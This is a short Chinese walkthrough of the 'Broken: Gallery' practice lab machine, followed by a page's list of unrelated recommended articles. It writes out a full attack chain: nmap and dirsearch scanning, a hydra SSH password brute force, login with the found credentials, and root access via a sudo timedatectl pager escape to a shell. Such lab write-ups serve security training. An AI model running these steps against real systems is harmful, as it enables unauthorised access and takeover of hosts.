Broken: Gallery靶机复现

CcHKer2024-08-18 16:34

靶机设置

靶机设置为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.142

目录扫描

dirsearch 192.168.112.142

访问浏览器

发现文件页面

查看后发现都没什么用

getshell

hydra -L rockyou.txt -P rockyou.txt 192.168.112.142 ssh

尝试爆破ssh账号密码

爆破成功

账号:broken

密码:broken

远程连接

ssh broken@192.168.112.142

连接成功

提权

sudo -l查看免密操作

尝试sudo提权

sudo timedatectl list-timezones

!/bin/sh

提权成功

相关推荐
虹科网络安全1 小时前
艾体宝洞察 | 利用“隐形字符”的钓鱼邮件:传统防御为何失效,AI安全意识培训如何补上最后一道防线
运维·网络·安全
石像鬼₧魂石1 小时前
Kali Linux 网络端口深度扫描
linux·运维·网络
适应规律3 小时前
UNeXt-Stripe网络架构解释
网络
纸带4 小时前
USB通信的状态
网络
无敌最俊朗@5 小时前
WebSocket与Webhook:实时通信技术对比
网络·websocket·网络协议
悟空空心5 小时前
服务器长ping,traceroute
linux·服务器·网络·ssh·ip·ping++
F133168929575 小时前
5030A 芯片 24V 转 5V 15A 大电流快充选型
网络·单片机·嵌入式硬件·物联网·汽车
2301_773730317 小时前
系统编程—IPC进程间通信
网络·网络协议
代码游侠7 小时前
学习笔记——IPC(进程间通信)
linux·运维·网络·笔记·学习·算法
Henry Zhu1237 小时前
VPP中ACL源码详解第二篇:ACL数据平面处理
运维·服务器·网络·计算机网络
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06BongoCat - 跨平台键盘猫动画工具07Open-AutoGLM Windows 安装部署教程08【AutoGLM部署】本地私有化部署AI手机Agent09Labelme从安装到标注:零基础完整指南10jdk21下载、安装(Windows、Linux、macOS)